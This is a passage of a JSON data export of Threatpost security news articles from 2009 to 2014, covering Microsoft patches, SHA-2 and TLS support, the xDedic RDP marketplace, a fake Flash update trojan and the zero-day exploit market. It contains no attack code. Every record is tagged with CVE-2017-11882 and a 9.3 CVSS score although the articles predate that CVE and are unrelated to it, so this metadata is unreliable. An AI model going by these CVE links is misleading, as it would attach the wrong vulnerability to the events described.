2018](<http://threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Citing calculations done by Jesse Walker based on the cost of commodity microprocessors and evidence that Moore\u2019s law will extend another decade, server-cycle costs would be around $173,000 on Amazon, well within reach of a funded attacker such as an organized crime group or nation state.\n\nThe use of fraudulent certificates would allow an advanced attacker such as a nation state to pose as Microsoft, Google or any site of their choosing.\n\nThe use of fraudulent certificates would allow an advanced attacker such as a nation state to pose as Microsoft, Google or any site of their choosing, putting web traffic and personal communication at risk. Google, and most recently Mozilla, have announced their road maps for SHA-1 deprecation. Beginning with an upcoming Chrome release in November, [Google\u2019s browser will no longer trust websites whose certificate chains trust SHA-1](<http://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>). Mozilla, meanwhile, asked Certificate Authorities and websites to [upgrade to cryptographically stronger versions of the algorithm](<http://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>) and said it would no longer trust SHA-1 certs after Jan. 1, 2017.\n\nMicrosoft\u2019s decision to make SHA-2 available for Windows 7 means that it joins Windows 8, 8.1 and Windows Server 2012, 2012 R2 and Windows RT and RT 8.1, as Windows versions that already support SHA-2. Windows 8 and higher support it by default and do not require an update, Microsoft said, adding that the update is not available for Windows Server 2003, Windows Vista, or Windows Server 2008.\n\nMicrosoft\u2019s decision to enable TLS for EAP implementations continues its push to encrypt its web-based services. In July, Microsoft announced that its webmail service [Outlook.com supports TLS encryption](<http://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965>) inbound and outbound, in addition to Perfect Forward Secrecy. OneDrive cloud storage also enabled Perfect Forward Secrecy in July, Microsoft said. PFS randomizes private encryption keys, meaning that if a key is someday compromised, it cannot be used to decrypt old messages.\n\nEAP, or Extensible Authentication Protocol, is the authentication framework used in Windows client and server rollouts. Windows 7, Windows Server 2008 R2, Windows 8, Windows 8.1, Windows Server 2012, and Windows RT are enabled through the update to support TLS via a simple registry modification, Microsoft said. A hacker who is able to exploit an older version of TLS could carry out a man-in-the-middle attack, hijack traffic and steal information in plaintext from sessions thought to be encrypted.\n\n_This article was updated Oct. 16 clarifying that SHA-2 is available only for Windows 7 and up, and earlier supported versions of Windows will not support SHA-2._\n", "cvss3": {}, "published": "2014-10-15T11:40:36", "type": "threatpost", "title": "Microsoft Extends SHA-2, TLS Support for Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-10-21T15:09:13", "id": "THREATPOST:AE4AEC18802953FE366542717C056064", "href": "https://threatpost.com/microsoft-extends-sha-2-tls-support-for-windows/108855/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:47", "description": "Nearly two-thirds of servers and PCs peddled on the xDedic underground marketplace belong to schools and universities, and most are based in the United States.\n\nIn a [recent analysis of xDedic](<https://www.flashpoint-intel.com/blog/cybercrime/xdedic-rdp-targets/>), Flashpoint found that besides the education sector, PC and servers tied to healthcare and legal firms make up the bulk of the available vulnerable systems.\n\nXDedic is the largest of many platforms cybercriminals use to buy access to compromised servers and PCs that use the Microsoft protocol Remote Desktop Protocol (RDP). Using brute-force password attacks, the xDedic gang has grown the number of available servers and PCs available for access to 85,000, up 10 percent from a year ago, according to Flashpoint.\n\nCriminals charge $50 to access the marketplace via Tor. Once in, criminals can browse thousands of compromised servers and PCs that can be accessed via a remote desktop session. Typically, access to a PC or server can range between $7 to $15, according to Flashpoint.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/06225118/xDedic-Black-Market.jpg>)Once a hacker accesses a remote system they can steal data, move laterally within a corporate network or install malware.\n\n\u201cXDedic is the most prolific of these cybercriminal gangs. They have their own proprietary tools and techniques and have been prospering over the past year,\u201d said Vitali Kremez, senior intelligence analyst at Flashpoint.\n\nIn its research, Flashpoint said the United States, Germany, and Ukraine appear to be the most frequently targeted countries. The most exploited sectors are education, followed by healthcare, legal, aviation, and government. Least vulnerable to these types of attacks are the financial and telecom sectors.\n\n\u201cSchools appear to be the hardest hit because they have the least mature security departments and just can\u2019t effectively mitigate against these type of attacks,\u201d Kremez said. \u201cSchools also sometimes have large banks of RDP systems for students to access and play with.\u201d\n\nWhen it comes to being targeted by these types of attacks, Kremez said, the leading factors are a lack of computer hygiene, the number of external RDP servers available and systems that have notoriously bad passwords.\n\nOver the past year, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) has had its ups and downs. XDedic\u2019s original domain (xdedic[.]biz) disappeared shortly after [a Kaspersky Lab report](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/22070309/xDedic_marketplace_ENG.pdf>) (PDF) published in June described how xDedic provided a platform for the sale of compromised RDP servers. A month later in July, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) resurfaced, this time on a Tor domain, where it remains today.\n\n\u201cMicrosoft Windows is the most popular of the platforms targeted by these type attacks,\u201d Kremez said. \u201cSimply put, Windows is the most prolific system out there. When a criminal is looking to find the biggest easiest target with the highest probability of a successful infiltration, Windows is it,\u201d he said.\n\nAs for Microsoft, Kremez said, it is constantly updating its RDP software to thwart bad guys. \u201cThe weakest link isn\u2019t software. It\u2019s the human factor and a failure to secure servers and client PCs to begin with. Often times people misconfigure their RDP server or give them passwords that are just not adequate.\u201d\n", "cvss3": {}, "published": "2017-04-25T13:45:07", "type": "threatpost", "title": "xDedic Market Spilling Over With School Servers, PCs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-03-22T11:03:12", "id": "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "href": "https://threatpost.com/xdedic-market-spilling-over-with-school-servers-pcs/125202/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yanex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home back will be changed\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains were for the new start pages, as well as the domains hosting the malicious Flash update were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:59", "description": "Microsoft plans to ship 10 security bulletins next Tuesday (June 9, 2009) with fixes for a wide range of code execution vulnerabilities affecting Windows, Microsoft Office and Internet Explorer.\n\nSix of the ten bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. See the [advance notice advisory](<http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx>) [microsoft.com]. Read more [at ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3503>).\n", "cvss3": {}, "published": "2009-06-04T18:02:33", "type": "threatpost", "title": "Coming on MS Patch Tuesday: 10 bulletins, 6 critical", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "href": "https://threatpost.com/coming-ms-patch-tuesday-10-bulletins-6-critical-060409/72733/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:16", "description": "Microsoft\u2019s security response team is investigating the release of a new zero-day flaw that exposes Windows 7 users to blue-screen crashes or code execution attacks.\n\nThe flaw could be exploited by local attackers to cause a denial-of-service or potentially gain elevated privileges, according to an advisory from VUPEN, a French security research outfit.\n\nFrom VUPEN\u2019s advisory:\n\n_This issue is caused by a buffer overflow error in the \u201cCreateDIBPalette()\u201d function within the kernel-mode device driver \u201cWin32k.sys\u201d when using the \u201cbiClrUsed\u201d member value of a \u201cBITMAPINFOHEADER\u201d structure as a counter while retrieving Bitmap data from the clipboard, which could be exploited by malicious users to crash an affected system or potentially execute arbitrary code with kernel privileges._\n\nThe flaw is confirmed on fully patched Microsoft Windows 7, Windows Server 2008 SP2, Windows Server 2003 SP2, Windows Vista SP2, and Microsoft Windows XP SP3.\n\nMicrosoft plans to issue 13 bulletins with patches for 34 vulnerabilities tomorrow (Tuesday August 10) but it is unlikely we will see a fix for this new issue.\n", "cvss3": {}, "published": "2010-08-09T13:39:48", "type": "threatpost", "title": "Another Windows 7 Zero-Day Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:22", "id": "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "href": "https://threatpost.com/another-windows-7-zero-day-released-080910/74306/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "\n\nEven for the most experienced security professionals, understanding complex attacks and vulnerabilities sometimes can be a serious challenge. A perfect example is the recent Microsoft IIS WebDAV vulnerability, which surfaced last week and has yet to be patched by Microsoft. It\u2019s a complicated issue, which some experts say was made more so by the guidance that the software maker released about it. Luckily, [Steve Friedl of Unixwiz.net](<http://unixwiz.net/techtips/ms971492-webdav-vuln.html>) has taken the time to make some sense of it all.\n\nFriedl, a security consultant, put together a flow chart that helps administrators figure out whether their Web servers are vulnerable. His key piece of advice is, if you\u2019re not sure whether your servers are at risk, find an expert who can test your machines and give you a definitive answer.\n\nThe vulnerability allows a remote anonymous user to bypass authentication checks and access the system in ways not intended for anonymous users: systems **are** getting hacked with this, and it\u2019s important to assess your local security posture and take steps to mitigate exposures that are discovered.\n\nMicrosoft published information on this in their [ Security Advisory (971492)](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), but we found their guidance confusing for users who were not IIS experts. While researching what each of the pieces meant, we decided to create this Tech Tip with a simple flowchart that will help rapidly get to the \u201cnot vulnerable\u201d stage if that\u2019s indeed the case.\n\nMost systems are likely not vulnerable, but unless the flowchart below leads to \u201cYou are not vulnerable\u201d, we strongly recommend seeking local expertise to help assess your situation properly.\n\nAs Friedl and others have noted, attackers are actively exploiting the IIS WebDAV vulnerability, and as there\u2019s no patch available yet, it\u2019s vital that enterprises take a close look at their Web servers to see whether they\u2019re vulnerable. Microsoft officials have said they\u2019re investigating the vulnerability and it would not be surprising to see an out-of-band patch for IIS, given the seriousness of the problem.\n", "cvss3": {}, "published": "2009-05-28T14:11:35", "type": "threatpost", "title": "A guide to the IIS WebDAV vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "href": "https://threatpost.com/guide-iis-webdav-vulnerability-052809/72745/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:24", "description": "_Editor\u2019s Note: This is the second of a [two-part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) podcast with independent security researcher Chris Soghoian. _\n\nIn the [first part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) of our podcast with independent security researcher Chris Soghoian, we talked about the way that the proliferation of \u201cfree\u201d applications have forced consumers into the position of increasingly trading privacy for access to cool new Web sites and tools. The market, Soghoian argued, has failed to provide choice to consumers who may want to participate in social networks, but don\u2019t want their online activities passed along to advertisers. __\n\nIn the second half of his interview with Threatpost Editor Paul Roberts, Chris switched focus from consumer protections from advertisers, to the fast-growing market for surveillance products.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2012/04/07052336/chris_soghoian-_part2.mp3>\n\nAs Soghoian sees it, the public sector \u2013 both government and law enforcement \u2013 have abrogated their responsibility to protect consumers from online predation. Why, you might ask? In Soghoian\u2019s view, the government turns a blind eye to insecure computers because those same insecure systems might provide access to law enforcement or intelligence services, should they need it.\n\nIts a daring claim, and one that\u2019s difficult to prove, because so much of the dealing in undocumented (\u201czero day\u201d) software vulnerabilities happens behind the scenes. Even published reports about information on exploitable holes in popular devices (like the [recent Forbes report about an Apple iOS zero day that sold for $250,000](<http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/>)) are often attributed to unnamed sources and impossible to verify. What is clear, Soghoian says, is that the discovery and publication of information on software holes in popular platforms [like Internet Explorer](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) has gone from an open and mostly volunteer activity by a small cadre of experts to a burgeoning and mostly underground market between researchers and software firms or, increasingly, indepedent middlemen. The market itself is worth tens- if not hundreds of millions of dollars.\n\nSoghoian said the public expects intelligence agencies to engage in digital spycraft.\n\n\u201cI\u2019m not nieve enough to believe governments can be stopped from doing this,\u201d Soghoian said. \u201cNSA is always going to be able to hack into people\u2019s systems and there\u2019s nothing we can do to stop this.\u201d\n\nBut the global trade in exploits by private firms, [such as Vupen Security](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) and other firms is another matter, he claims.\n\n\u201cIf you think of our own intelligence agencies can be trusted, maybe you don\u2019t think foreign intelligence agencies can. And U.S. middleman firms are providing these flaws to these agencies.\u201d\n\nSoghoian is not the first authority to raise the red flag on for profit vulnerability and exploit sales. At the CANSECWEST security show in Vancouver, [Chaouki Bekrar of VUPEN security defended his company\u2019s sales of exploitable security holes to private customers](<https://threatpost.com/chaouki-bekrar-man-behind-bugs-030912/>). Bekrara told Threatpost at that show that VUPEN would be holding on to a memory corruption flaw in IE\u2019s protected mode sandbox for itself and its customers. It can be reused in combination with other bugs in IE for future sales, much to the consternation of security researchers.\n\nJust as troubling, Soghoian says, is the growing use of digital surveillance tools by even state and local authorities \u2013 a development that Soghoian finds troubling.\n\n\u201cThe Keystone cop is not an expert in information security,\u201d he said.\n\nRather than tolerate widespread insecurity on both laptop and mobile devices, governments \u2013 including the U.S. government \u2013 should use its full weight to encourage better online security, including automated patching and software updates to remove exploitable holes, he said.\n\nCheck out the rest of [Threatpost\u2019s interview with Chris Soghoian here](<https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/>).\n", "cvss3": {}, "published": "2012-04-05T11:30:00", "type": "threatpost", "title": "Arms Race In Zero Days Spells Trouble For Privacy, Public Safety", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:20:47", "id": "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "href": "https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/76400/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:16", "description": "[](<https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/>)Microsoft has released a one-click \u201cfix-it\u201d workaround to help Internet Explorer users block malware attacks against an unpatched browser vulnerability.\n\nThe Fix-It workaround, [available here](<http://support.microsoft.com/kb/981374>), effectively disables peer factory in the iepeers.dll binary in affected versions of Internet Explorer. \n\nThe workaround comes on the heels of the [public release of exploit code](<https://threatpost.com/exploit-code-published-latest-ie-zero-day-031010/>) into the freely available Metasploit pen-testing framework.\n\nMicrosoft acknowledged the availability of exploit code for the issue and again urged users to upgrade to Internet Explorer 8, which is not vulnerable to this issue.\n\nThe company urged IE users to test the Fix-It workaround thoroughly before deploying as certain functionality that depends on the peer factory class, such as printing from Internet Explorer and the use of web folders, may be affected.\n\nMicrosoft also [confirmed](<http://blogs.technet.com/msrc/archive/2010/03/12/update-on-security-advisory-981374.aspx>) it is considering an out-of-band emergency patch to correct the underlying flaw.\n\nWe have seen speculation that Microsoft might release an update for this issue out-of-band. I can tell you that we are working hard to produce an update which is now in testing. This is a critical and time intensive step of the process as the update must be tested against all affected versions of Internet Explorer on all supported versions of Windows. Additionally, each supported language version needs to be tested as well as testing against thousands of third party applications. We never rule out the possibility of an out-of-band update. When the update is ready for broad distribution, we will make that decision based on customer needs. \n\nMalicious hackers are already exploiting the vulnerability to launch targeted attacks. The earliest attacks include the use of a backdoor that allows complete access to a vulnerable machine.\n\nThe backdoor allows an attacker to perform various functions on the compromised system, including uploading and downloading files, executing files, and terminating running processes.\n", "cvss3": {}, "published": "2010-03-15T14:17:12", "type": "threatpost", "title": "Microsoft Issues Fix-It Workaround for IE Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:14:29", "id": "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "href": "https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/73686/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "Microsoft has confirmed the reported [vulnerability in the WebDAV implementation in IIS 5.0, 5.1 and 6.0](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), saying that the flaw could be used to bypass the authentication mechanism on the Web server. However, the company said that there are a number of mitigating factors involved and that company security officials have not seen any attacks against the weakness so far.\n\nMicrosoft officials said that the vulnerability is mitigated by several things, including the fact that WebDAV is not enabled by default on IIS 6.0. However, the WebDAV protocol is widely used to share documents and information on Web servers. Normally implemented access control lists (ACLs), which prevent users from accessing files that they do not have permission to access, also would limit the damage of an attack.\n\nThe company also said that the vulnerability affects versions 5.0 and 5.1 of IIS, along with 6.0, which was the version that had been reported to be vulnerable originally. The most effective workaround until a patch is available is to disable WebDAV.\n", "cvss3": {}, "published": "2009-05-19T13:59:37", "type": "threatpost", "title": "Microsoft confirms flaw in WebDAV in IIS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "href": "https://threatpost.com/microsoft-confirms-flaw-webdav-iis-051909/72674/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:10", "description": "Late last week it emerged that Microsoft had searched through the contents of a French blogger\u2019s Hotmail account in order to track down the source of a leak of proprietary information from the Redmond, Wash., tech giant.\n\nThe Electronic Frontier Foundation and transparency advocates have expressed stark disapproval of the entire situation. The EFF is even suggesting that Microsoft\u2019s actions here constitute[ a direct violation of the Electronic Communications Privacy Act](<https://www.eff.org/deeplinks/2014/03/microsoft-says-come-back-warrant-unless-youre-microsoft>) (ECPA).\n\nThe saga began when a Microsoft employee named Alex Kibkalo allegedly stole protected information pertaining to Microsoft\u2019s Activation Server Software Developer\u2019s Kit (SDK) and emailed it \u2013 via Hotmail, which is owned and operated by Microsoft \u2013 to a French blogger.\n\nAround August 2012, Microsoft became aware that someone had leaked the SDK after the blogger in question \u2013 who is not named in the criminal complaint filed against Kibkalo in September 2012 \u2013 began posting screenshots of unreleased Windows operating system features. Microsoft\u2019s Trustworthy Computing Investigations (TWCI), the division of the company tasked with protecting it against both external and internal threats, launched an investigation accordingly.\n\nIn early September 2012, an unnamed person contacted former president of the Windows Division of Microsoft, Steven Sinofsky. This source had been contacted by the blogger in order to confirm that the code he had received was in fact proprietary Microsoft code. In an interview with the TWCI, the source indicated that the blogger had contacted the source via Hotmail.\n\nAccording to the complaint (which was acquired by the [Register](<http://regmedia.co.uk/2014/03/20/kibkalo-complaint.pdf>)), \u201cAfter confirmation that the data was Microsoft\u2019s proprietary trade secret, on September 7, 2012 Microsoft\u2019s Office of Legal Compliance (OLC) approved content pulls of the blogger\u2019s Hotmail account.\u201d\n\nUpon examining the contents of the blogger\u2019s email account, Microsoft found Kibkalo\u2019s correspondence with the blogger. The company then provided all of this information to the FBI, who then arrested Kibkalo and charged him with the theft of trade secrets.\n\nMicrosoft published a response to the emergence of these facts, noting that it would make certain changes to its policies, but ultimately defending its right to search the contents of its users\u2019 communication without legal oversight.\n\n\u201cCourts do not, however, issue orders authorizing someone to search themselves, since obviously no such order is needed,\u201d wrote John Frank, deputy general counsel and vice president of legal and corporate affairs. \u201cSo even when we believe we have probable cause, there\u2019s not an applicable court process for an investigation such as this one relating to the information stored on servers located on our own premises.\u201d\n\nFrank goes on to claim that the company acted within its terms of service by conducting \u201ca limited review of this third party\u2019s Microsoft operated accounts,\u201d which the company only undertakes in \u201cthe most exceptional circumstances\u201d after \u201c[applying] a rigorous process before reviewing such content.\u201d\n\nFrank also notes the company\u2019s understanding of public concern regarding their actions, and thus, the company says it will adhere to the following policies moving forward:\n\n * Microsoft will not conduct a search of customer email and other services unless the circumstances would justify a court order, if one were available.\n * To ensure compliance with the standards applicable to obtaining a court order, Microsoft will rely in the first instance on a legal team separate from the internal investigating team to assess the evidence. It will move forward only if that team concludes there is evidence of a crime that would be sufficient to justify a court order, if one were applicable. As a new and additional step, the company will then submit this evidence to an outside attorney who is a former federal judge. It will conduct such a search only if this former judge similarly concludes that there is evidence sufficient for a court order.\n * Even when such a search takes place, it is important that it be confined to the matter under investigation and not search for other information. Microsoft says it will continue to ensure that the search itself is conducted in a proper manner, with supervision by counsel for this purpose.\n * Finally, the company believes it is appropriate to ensure transparency of these types of searches, just as it is for searches that are conducted in response to governmental or court orders. The company therefore will publish as part of its bi-annual [transparency report](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653>) the data on the number of these searches that have been conducted and the number of customer accounts that have been affected.\n\n\u201cUnfortunately, this new policy just doubles down on the Microsoft\u2019s indefensible and tone-deaf actions in the Kibkalo case,\u201d says EFF legal fellow, Andrew Crocker. \u201cIt begins with a false premise that courts do not issue orders in these circumstances because Microsoft was searching \u2018itself,\u2019 rather than the contents of its user\u2019s email on servers it controlled.\u201d\n\nHad the company believed it had probable cause to search one of its users\u2019 Hotmail accounts, Crocker continues, Microsoft could have easily presented its case to the FBI and acquired a proper search warrant.\n\n\u201cTo be sure, the process described in Microsoft\u2019s statement bears more than a passing resemblance to a standard criminal investigation, with a prosecutorial team building a case and then presenting it to an ostensibly neutral third party, a retired federal judge no less,\u201d Crocker writes. \u201cLet\u2019s call it Warrants for Windows!\u201d\n\nCrocker admits that while this search may have revealed criminal activity, it was also conducted in Microsoft\u2019s own self-interest, and, therefore, sets an extremely dangerous precedent.\n", "cvss3": {}, "published": "2014-03-24T12:55:29", "type": "threatpost", "title": "Microsoft Reads User Email without Warrant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-24T16:55:29", "id": "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "href": "https://threatpost.com/critics-upset-as-microsoft-conducts-email-search-in-leak-investigation/104969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows &amp;, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information on the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": 